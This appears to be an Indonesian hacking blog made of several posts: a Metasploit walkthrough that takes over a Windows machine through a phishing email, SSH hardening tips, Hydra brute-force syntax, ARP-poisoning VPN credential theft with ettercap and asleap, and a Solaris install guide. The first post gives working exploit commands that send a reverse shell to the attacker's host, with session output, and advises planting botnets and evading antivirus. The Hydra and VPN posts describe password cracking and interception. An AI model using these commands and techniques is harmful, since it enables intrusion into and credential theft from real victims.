kali ini coba saya demonstrasikan cara take over komputer windows all version+full pacth+antivirus updated memanfaatkan kelemahan outlook express….
kali ini saya menggunakan exploit ani_loadimage_chunksize.kebetulan dah ada didalam metasploit…
exploit ini akan meng-exploitasi file USER32.dll ( LoadAniIcon() function )..
untuk lebih jelasnya silahkan lihat di <a href=”http://downloads.securityfocus.com/vulnerabilities/exploits/ani_loadimage_chunksize2.rb”
exploit ini bersifat remote.artinya hacker bisa melakukan bind atau reverse command prompt pada komputer korban..

Kasus :
hacker akan mencoba mengirim email phising ke target..setelah target membaca email tersebut dengan outlook express,hacker berhasil melakukan bind command prompt komputer korban
disini saya menggunakan server email zimbra pada komputer opensuse ( 172.18.3.188 ) dengan doma
Ok…Here We go……

linux yang saya gunakan adalah backtrack 3…my favourite linux..

1. checking network connection

bt ~ # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:5C:65:69
inet addr:172.18.100.100 Bcast:172.18.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:40687 errors:0 dropped:0 overruns:0 frame:0
TX packets:728 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4219258 (4.0 MiB) TX bytes:877329 (856.7 KiB)
Interrupt:16 Base address:0×2000

bisa di lihat bahwa ip attacker 172.18.100.100

2. move to metapsploit directory

bt framework3 # cd /pentest/exploits/framework3
bt framework3 # ls
README framework3@ modules/ msfelfscan* msfpayload* scripts/
data/ karma.rc msfcli* msfencode* msfpescan* tools/
documentation/ lib/ msfconsole* msfgui* msfweb*
external/ load.gif msfd* msfopcode* plugins/
bt framework3 #

3. executing metasploit

bt framework3 # ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|

=[ msf v3.2-release
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux

msf > msf > use windows/email/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ani_loadimage_chunksize) > set RHOST ian.org
RHOST => ian.org
msf exploit(ani_loadimage_chunksize) > set LHOST 172.18.100.100
LHOST => 172.18.100.100
msf exploit(ani_loadimage_chunksize) > set LPORT 443
LPORT => 443
msf exploit(ani_loadimage_chunksize) >
msf exploit(ani_loadimage_chunksize) > set RPORT 25
RPORT => 25
msf exploit(ani_loadimage_chunksize) > set MAILFROM ian@hacking.com
MAILFROM => ian@hacking.com
msf exploit(ani_loadimage_chunksize) > set MAILTO laharisi@ian.org
MAILTO => laharisi@ian.org
msf exploit(ani_loadimage_chunksize) > exploit

note :
MAILFROM : alamt email hacker
MAILTO : alamt email korban
RHOST : domain komputer korban
LHOST : alamt komputer hacker
PAYLOAD : windows/shell_reverse_tcp ( melakukan reverse shell terhadap command prompt komputer korban )

4..ketika exploit di jalankan,exploit akan mengirim email ke alamat yang sudah di tentukan.

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Connecting to SMTP server ian.org:25…
[*] SMTP: 220 ian.ian.org ESMTP Postfix
[*] SMTP: 250-ian.ian.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
[*] SMTP: 250 2.1.0 Ok
[*] SMTP: 250 2.1.5 Ok
[*] Sending the message (701857 bytes)…
[*] SMTP: 354 End data with .
[*] SMTP: 250 2.0.0 Ok: queued as D7A17113913
[*] Closing the connection…
[*] SMTP: 221 2.0.0 Bye
[*] Waiting for a payload session (backgrounding)…
msf exploit(ani_loadimage_chunksize) >

5..ketika korban membuka email tersebut dengan outlook express maka komputer korban akan membuka UNPRIVILIGED PORT yang melakukan reverse ke command prompt ( ingat PAYLOAD diatas ).kkkkkk..

6.. apa yang terjadi pada konsole komputer hacker..????hacker berhasil mendapatkan sebuah sesi koneksi ke komputer korban dengan hak administrator..

msf exploit(ani_loadimage_chunksize) > [*] Command shell session 1 opened (172.18.100.100:443 -> 172.18.2.151:1039)
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Description Tunnel
— ———– ——
1 Command shell 172.18.100.100:443 -> 172.18.2.151:1039

7…waktunya take over..just type session -i

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1…

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\master>
C:\Documents and Settings\master>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.18.2.151
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.18.2.1

C:\Documents and Settings\master>

akhirnya kita bisa mendapatkan command prompt komputer korban…..uuhhhhhhhhh
apakah hacking sampe disini..???it’s not over….hacking has just began..
setelah itu hacker bisa meng-upload berbagai program misalnya keylogger,virus,worm..kalo saya seh lebih senang Meng-Upload BOTNET such as spyboot,RX-boot aka spike..tapi jangan lupa ganti signature dari bot agar tidak di kenali oleh anti virus.configuring own irc server – > uploading botnet –> ….??!! masih banyak…gk akan saya jelaskan…cukup sampe disini…

Tutorial ini dibuat hanya untuk kepentingan penelitian aja..tidak digunakan untuk hal2 yang merusak..

Thist Tutorial Dedicated to my sweet heart (H***Y)

sesuai dengan topik.kali ini yang akan di jelaskan adalah cara mengamankan ssh server,,,,,
ssh merupakakan protocol autentikasi yang memungkinkan seseorang me-remote komputer yang menjalankan service ssh ( misalnya openssh)..

cara2 untuk mengamankan komputer yang menjalankan service ssh adalah :

1. edit file sshd_conf ( vim /etc/ssh/sshd_conf )
2. berikut adalah variabe2 yang harus diganti :
– ganti variable “port 22″ ke variable “port misalnya port 123

Port 2222

– ganti variable “PermitRootLogin yes” menjadi “PermitRootLogin no” dan aktifkan pilihan StrictModes

PermitRootLogin no
StrictModes

hal ini untuk mencegah akses root / administaror ke server..kenapa..??? ini bisa di manfaatkan oleh “orang yang tidak bertanggung jawab” untuk melakukan bruteforce”..

– Ubah variable “MaxAuthTries 6″ menjadi “MaxAuthTries 2″

MaxAuthTries 2

Ini berari Maximal user yang login ke server sebanyak 2 kali saja..ini untuk mengurangi dampak serangan bruteforce

setelah itu tinggal restart service sshnya

/etc/init.d/ssh restart

cara lain adalah dengan menggunakan firewall pada port tersebut..contohnya firewall dengan menggunakan iptables ( linux ) :
1.filter port ssh ( misalnya 22 )..misalnya user yang di izinkan melakukan koneksi ke server ssh adalah user dengan ip 172.18.3.188 dengan alamat mac address 00:11:22:33:44:55,maka contoh filteringnya adalah :

ian:/etc/ssh #iptables -A INPUT -p tcp –dport 22 -s 172.18.3.188 -m mac –mac 00:11:22:33:44:55 -j ACCEPT

2.setelah itu blok port ssh..

ian:/etc/ssh #iptables -A INPUT -p tcp –dport 22 -j DROP

ini sekedar untuk pengaman yang standar aja..untuk pengamanan lebih lanjut kan menggunakan PAM ( plugbble authentic method )…tapi nanti di tutorial slanjuntnya…:D
so be patience….pissssssssssssss

this tutorial dedicated to someone…(H*****y)

kali ini saya coba menjeskan tentang cara bruteforce password dengan hydra,,,,
hydra adalah tools bruteforce yang sangat2 terkenal di kalangan para dedemit maya…untuk info lebih lanjut tentang hydra
silahkan lihat di situs resminya

hydra sendiri terbagi menjadi 2 mode penggunaan,yaitu mode text dan mode grafik ( gui )…
kali ini yang akan saya jelaskan adalah cara menggunakan hydra pada modus text..
hydra bisa digunakan untuk melakukan password cracking ( bruteforce method ) pada berbagai maca protocol..mulai dari cisco,telnet,sshv2,snmp,http metode get dll..
kebetulan hydra yang saya gukanan adalah hydra versi baru yang uda ada pada backtrack 3..
Ok here we go…………………..

ini adalah output hydra ketika di ketik pada console backtrack,,

bt ~ # hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, “n” for null password, “s” try login as pass
-C FILE colon seperated “login:pass” format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd
OPT some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs – use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org

basic dari penggunaan hydra misalnya :

hydra IP_target protocol -l username -P password list -v(verbose options)

contohnya
bila kita ingin melakukan password cracking pada mesin windows yang menjalakan servis telnet,maka cara bruteforce dengan hydra misalnya :

hydra 10.14.10.2 telnet -l Administrator -P wordlist -v

ok,kali ini saya akan menjelaskan tentang cara hacking vpn connection dengan tujuan untuk mendapatkan username dan password untuk melakukan koneksi ke serper vpn….
recruitment :
1.linux backtrack
2.cokelat ( buat cemilan,,hhahaha )
3.green teah…kekna asyik juga…:D
berikut adalah data2 detail mengenai jaringan yang akan di hack.
– ip server vpn 192.168.1.1
– gateway LAN 10.14.10.1
– ip attacker 10.14.10.6
– ip target 10.14.10.4

Ok kita mulai saja aksinya..cieeeeeeee………..

1.kita harus meredirect traffic korban.yang tadinya dari komputer target —-> gateway —- >server vpn menjadi
komputer target ——-> komputer attacker —–> gateway ——> server vpn.
teknik ini sering dinamakan dengan arp poisoning……
tools yang saya gunakan ettercap.kebetulan uda ada di dalam backtack..so tinggal di pake doang..
disini saya menggunakan ettercap pada modus text…soalnya lebih enak seh..wkwkwkwkkw
contoh sintaxnya ettercap -T -q -M ARP /ip target/ /ip gateway/
jadi pada kasus ini akan menjadi ettercap -T -q -M ARP /10.14.10.4/ /10.14.10.1/
– Optiosn T : modus text
– Options -q ; ettercap di jalankan pada keadaan tenang / outputnya tdak terlalu banyak
– Options -M : menggunakan teknik ARP spoofing
output dari sintax di atas adalah

2.pada kali ini saya menggunakan teknik brutefoce dengan menggunakan file kamus ( wordlist) dengan harapan
password dari target ada dalam file tersebut…:D
untuk itu saya akan membuat file hash dan file index dari wordlist yang sudah ada…..program yang saya gunakan
adalah genkeys..ini adalah conntohnya

hasilnya misalnya berupa file word.idx word.has ( penamaan file terserah aja )

– OPtions -r : meminta inputan dari sebuah file ( dalam hal ini file wordlist )
– Options -f : akan membuat output dari file wordlist menjadi file2 hash
– Options -f : akan membuat output berupa file index dari wordlist
kedua file baru tersebut dibutuhkan oleh program vpn crack yang akan kita gunakan ( asleap )

3. untuk melakukan bruteforce saya menggunakan program asleap..yeaaahhh,,,tapi yang sy gunakan adalah asleap bawaan dari backtrack 2..soalnya asleap pada backtrack 3 aga2 eror ..
waktunya beraksi..
saya akan melakukan cracking dengan program asleap misalnya

– Options -i : menunjukkan interface/ethernet yang di gunakan..misalnya eth0
– options -f : meminta inputan dari file hash yang uda kita buat tadi..( lihat point 2 diatas )
– Options -n : meminta inputan dari fle index yang uda di buat….

ketika target melakukan koneksi ke server vpn,kita bisa melihat output koneksinya dari program ettercap yang kita jalankan tadi….

apa yang terjadi…???kita bisa melihat username dan password dari target dengan program asleap diatas..
ini hasilnya ..

akhirnya kita bisa melihat username dan password dari target yang melakukan koneksi……

2. Solaris 9 Administration: A Beginner’s Guide

Download

3 Kumpulan berbagai ebook lihat Disini

Sebelum melakukan insalasi tentunya harus punya installer sun solaris..kalau mau gratis silahkan download di http://mirror.its.ac.id/pub/ISO/Solaris
disini saya menggunakan SunSolaris 10 x86( DVD ) yang sesuai dengan Spek komputer saya..
Langsung aja dech..

1.Masukan CD/DVD sun solaris
2.Set komputer anda agar bisa boot dari DVD/CDrom
3.setelah boot dari CD/DVD maka akan muncul tulisan

Loading stage 2....
GNU GRUB version 0.95 ( xxK lower /
xxK upper memory)

4.Setelah itu akan muncul dialog bootloader grub seperti

Solaris
Solaris Serial Console ttya (headless and rack-mounted systems only)
Solaris Serial Console ttyb (for1x50, v60x and v65x)

pilih pada bagian pertama ( Solaris ) terus tekan enter

5. akan keluar kotak dialog baru seperti

SunOS Release 5.10 version generic_120012-12 32-bit
Copyright 1983-2005 Sun Microsystems, Inc. All rights reserved.
Use is subject to license terms.
Configuring devices.

(timeout)

bagian ini menentukan metode cara instalasi..menggunakan command line atau Deskop ( GUI )….kebetulan saya menggunakan pilihan pertama ( default ).setelah tekan enter..

6.ehh muncul lagi tulisan yang “aneh2″

Solaris Interactive

Press ENTER to continue.

tinggal tekan ENTER aja kok..

7 setelah enter di tekan,ehh keluar lagi dialog baru

tinggal tekan enter aja..setelh itu dialog baru akan keluar yang meminta kita untuk menentukan bahasa yang di gunakan

bagi yang gk senang bahasa inggris silahkan pilih yang laen..kali ini saya piling English ( 0 )..setelah itu tinggal tekan ENTER lagi

8.pada bagian kanan bawah akan keluar konsole

setelah itu nongol lagi dialog popup baru

Klik Next Untuk melanjutkan instalasi

9.setelah itu kita berada pada bagian networking….ehhhmmm tinggal pilih networked atau non-networked ..
saya memilih non-networked…bagian tentang solaris networking ada di jelaskan pada tutorial berikutnya..

10. setelah itu kita disuruh menentukan hostname..silahkan masukan hostname kesayangan anda.:D

Klik Next untuk melanjutkan.
11. keluar lagi dialog NFSv4 Domain Name

Tinggal Klik Next aja..

12. The Time Zone window appears.hehhe..sekali2 pake bahasa inggris..

Klik Next and akan muncul

tentukan zona waktu setelah itu Klik next…

13..tentukan settingan waktu sesuai dengan waktu anda

setelah itu klik next

14.tentukan password root

klik next untuk lanjut

15. new window appear..bagian ini mentukan servies2 remote misalnya telnet,rpc ( nfs ) dll.

silahkan pilih yes or no..setelah itu klik next.

16 setelah itu muncul

klik next aja

17.
Klik Next untuk lanjut..
18
tinggal pilih yes aja semua..terus klik next lagi..

19.
Tinggal Klik Ok
20. tentukan medium instalasi..pada kasus ini saya menggunakan CD/DVD

setelah itu klik next.
21.

centang bagian ACCEPT and klik next to continue

22.
ada 2 pilihan..custom ada defautl instalation.saya memilih default..setelah itu klik next.
23.
bagian ini memperlihakan technical description tentang solaris yang akan di install..
parrisi yang di gunakan juga auto..artinya solaris akan mempartisi sendri…hal ini karena pada menu sebelumnya kita memilih opsi default..Klik Next untuk lanjut

24..Proses instalasi sedang berjalan

25.setelah selesai instalasi,maka tampilan sun solaris seperti